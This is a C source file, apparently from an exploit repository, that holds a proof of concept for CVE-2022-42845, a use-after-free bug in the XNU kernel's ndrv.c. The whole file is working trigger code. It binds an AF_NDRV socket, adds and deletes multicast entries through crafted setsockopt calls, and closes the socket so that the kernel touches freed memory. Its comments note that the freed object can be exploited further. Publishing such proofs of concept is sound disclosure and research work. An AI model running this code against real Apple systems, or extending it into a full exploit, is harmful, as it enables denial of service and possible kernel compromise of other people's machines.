■ ■ ■ ■ ■ ■
CVE-2022-42845/CVE-2022-42845.c
| 1 | + | #include <stddef.h> |
| 2 | + | #include <sys/socket.h> |
| 3 | + | #include <netinet/in.h> |
| 4 | + | #include <stdio.h> |
| 5 | + | #include <unistd.h> |
| 6 | + | #include <string.h> |
| 7 | + | #include <stdlib.h> |
| 8 | + | |
| 9 | + | /* |
| 10 | + | |
| 11 | + | Author: Adam Doupe (adamd) |
| 12 | + | POC for CVE-2022-42845: a kernel use-after-free vulnerability in ndrv.c in XNU. |
| 13 | + | Writeup: https://adamdoupe.com/blog/2022/12/13/cve-2022-42845-xnu-use-after-free-vulnerability-in-ndrv-dot-c/ |
| 14 | + | |
| 15 | + | */ |
| 16 | + | |
| 17 | + | |
| 18 | + | #define TCPOPT_SACK 5 |
| 19 | + | #define TCPOLEN_CC 6 |
| 20 | + | |
| 21 | + | struct sockaddr_generic { |
| 22 | + | uint8_t sa_len; |
| 23 | + | uint8_t sa_family; |
| 24 | + | }; |
| 25 | + | |
| 26 | + | int main() |
| 27 | + | { |
| 28 | + | int sockfd = socket(AF_NDRV, SOCK_RAW, IPPROTO_IP); |
| 29 | + | if (sockfd == -1) |
| 30 | + | { |
| 31 | + | perror("socket"); |
| 32 | + | return -1; |
| 33 | + | } |
| 34 | + | |
| 35 | + | char* sa_data = "lo0"; |
| 36 | + | struct sockaddr_generic sag_s = { |
| 37 | + | .sa_len = (sizeof(struct sockaddr_generic) + strlen(sa_data) + 1), |
| 38 | + | .sa_family = AF_NS, |
| 39 | + | }; |
| 40 | + | |
| 41 | + | char* sockaddr = (char*) malloc(sag_s.sa_len); |
| 42 | + | memcpy(sockaddr, &sag_s, sizeof(struct sockaddr_generic)); |
| 43 | + | memcpy(sockaddr + sizeof(struct sockaddr_generic), sa_data, strlen(sa_data) + 1); |
| 44 | + | |
| 45 | + | char* sockaddr_real = "\x05\x00\x6c\x6f\x30"; |
| 46 | + | int size = 5; |
| 47 | + | int result = bind(sockfd, (struct sockaddr*)sockaddr_real, size); |
| 48 | + | |
| 49 | + | if (result != 0) |
| 50 | + | { |
| 51 | + | perror("bind"); |
| 52 | + | return -1; |
| 53 | + | } |
| 54 | + | |
| 55 | + | // Add B to `nd_multiaddrs` |
| 56 | + | |
| 57 | + | char val[] = "\010\000\000\000\000\000\000\000"; |
| 58 | + | int val_size = 8; |
| 59 | + | result = setsockopt(sockfd, 0, TCPOPT_SACK, val, val_size); |
| 60 | + | if (result != 0) |
| 61 | + | { |
| 62 | + | perror("setsockopt"); |
| 63 | + | return -1; |
| 64 | + | } |
| 65 | + | |
| 66 | + | // Add A to `nd_multiaddrs` (which becomes the head) |
| 67 | + | |
| 68 | + | char val_2[] = "\010\000\000\374\377\000\000\000"; |
| 69 | + | int val_2_size = 8; |
| 70 | + | result = setsockopt(sockfd, 0, TCPOPT_SACK, val_2, val_2_size); |
| 71 | + | if (result != 0) |
| 72 | + | { |
| 73 | + | perror("setsockopt"); |
| 74 | + | return -1; |
| 75 | + | } |
| 76 | + | |
| 77 | + | // Delete B |
| 78 | + | result = setsockopt(sockfd, 0, TCPOLEN_CC, val, val_size); |
| 79 | + | if (result != 0) |
| 80 | + | { |
| 81 | + | perror("setsockopt"); |
| 82 | + | return -1; |
| 83 | + | } |
| 84 | + | |
| 85 | + | // At this point B is freed, so we can call multiple functions to exploit |
| 86 | + | |
| 87 | + | // closing the socket will call `ndrv_do_remove_multicast` which will crash referencing the deallocated B |
| 88 | + | close(sockfd); |
| 89 | + | } |
| 90 | + | |